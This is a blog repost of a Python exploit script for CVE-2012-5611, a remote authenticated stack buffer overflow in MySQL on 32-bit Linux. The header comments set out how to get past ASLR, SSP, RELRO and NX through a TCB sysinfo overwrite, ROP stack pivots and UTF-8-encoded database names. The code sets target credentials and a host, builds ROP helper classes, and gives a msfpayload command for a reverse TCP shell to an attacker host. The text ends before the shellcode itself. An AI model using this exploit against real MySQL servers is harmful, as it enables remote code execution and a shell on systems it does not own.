MySQL Stack Buffer Overflow Linux x86 32bits

测试方法:

程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1 !/usr/bin/env python
  2 # 27/12/12 - status : public release
  3  
  4 # CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
  5 # -------- Author   : ipv
  6 # -------- Impact   : high
  7 # -------- URL        : http://blog.ring0.me/
  8 # -------- Description
  9 #
 10 # The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
 11 # MySQL server is prone to a remote buffer overflow that 
 12 # allow remote authenticated attacker to reach code execution in the 
 13 # context of the user running MySQL instance (default: mysql user).
 14  
 15 # The vulnerability resides in acl_get function, called when authenticated
 16 # user  requests a privileged Account Managment statement. MySQL fails 
 17 # to verify user controlled data len of "db" parameter.
 18 #
 19 #     end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
 20 #
 21 # The destination address of strcpy is located on a mmaped page dedicated to 
 22 # user connection which allow a buffer overflow on adjacent memory.
 23 #
 24 # Differents attacks vector may be possiblea according the system.
 25 # FYI Microsoft Windows versions are as well vulnerables.
 26 #---------------------------------------------------------
 27 # To bypass ASLR/SSP/RELRO/NX:
 28 #------------------------------------------------------------------------------
 29 # I take profit of Threading-Model. This means MySQL use only one address 
 30 # space for all MySQL ressources (data structures, network managment, 
 31 # session, etc.). 
 32 # To bypass SSP, i overwrite sysinfo handler(pointing to sysenter vdso) of 
 33 # TCB structure located more higher on the stack. 
 34 # ROP chains aims to pivot to our controlled stack data. At this point, 
 35 # if we overwrite sysinfo handler, we cannot use ret2libc and/or GOT 
 36 # deferencing technique since libc API relies on the sysinfo pointer 
 37 # to call sysenter.
 38 #
 39 # So to accomplish code exec, afaik, you have two way : 
 40 #    1 - Extract sysinfo of an intact TCB and use it as proxy call
 41 #    (or you can restore the first sysinfo after doing modification on got)
 42 #        -> i use it for redhat exploit (no SSP on redhat/centos); 
 43 #        -> this allow us to bypass relro/alsr/nx
 44 #        relro.
 45 #    2 - Find a int0x80 / sysenter gadget in .text ;
 46 #    (Bad instruction follow int0x80 gadget, you have a one shooter to get
 47 #    code exec). So, i advise you to find a sysenter)
 48 #        - i use sysenter for ubuntu 10.04 self-compiled with SSP. 
 49 #        - this allow us bypass relro/ssp/alsr/nx
 50 # 
 51 # Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypass
 52 # SSP/ASLR/NX.
 53 #
 54 #---------------------------------------------------------
 55 # UTF-8 and ROP chains limitation :
 56 #---------------------------------------------------------
 57 # Mysql Schema Object Name restricts database name to be alpha numeric 
 58 # (and $ _).
 59 # To bypass it, i use utf-8 encoding with byte lower than 0x80. Encoding is 
 60 # done via MySQL when databasename is quoted with `` (mandatory to 
 61 # successful exploit target). Yes the devil is in the details.
 62  
 63 # MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
 64 #
 65 # For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net
 66  
 67 ########################################################################
 68 # Modules
 69 #
 70  
 71 import pymysql
 72 import sys
 73 import struct
 74 import os, socket
 75  
 76 ########################################################################
 77 # Authentication options 
 78 #
 79  
 80 MYSQL_USER = "test"
 81 MYSQL_PASSWORD = ""
 82  
 83 #MYSQL_HOST = "192.168.130.147"
 84 MYSQL_HOST = "192.168.130.129"
 85 MYSQL_PORT = 3306
 86  
 87 ########################################################################
 88 # Helper
 89 # 
 90  
 91 def _x(v):
 92     if isinstance(v, str):
 93         return v
 94     return struct.pack("<I", v)
 95  
 96 # TCP is used when we face to SSP
 97 class _TCB:
 98     tcb = 0 # updated later by a ret gadget
 99     dtv = "BBBB"
100     _self = "CCCC"
101     multiple_threads= "DDDD"
102     sysinfo = 0 # SEIP - updated later by stack pivot gadget 
103     stack_guard = "AAAA"
104     pointer_guard = 0 # updated later by a pop pop ret gadget
105  
106 # base class
107 class rc_base:
108     eip_off = 0
109     align_payload = 0
110     align_stack = 2048
111     retsled = ""
112     safe_overwrite = ""
113     pivot = ""
114     pppr = ""
115     ppr = ""
116     
117     # ./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
118     # XXX - CHANGEME !
119     sc_rev_tcp =

 

posted @ 2012-12-28 21:24  夏虫xm  阅读(296)  评论(0编辑  收藏  举报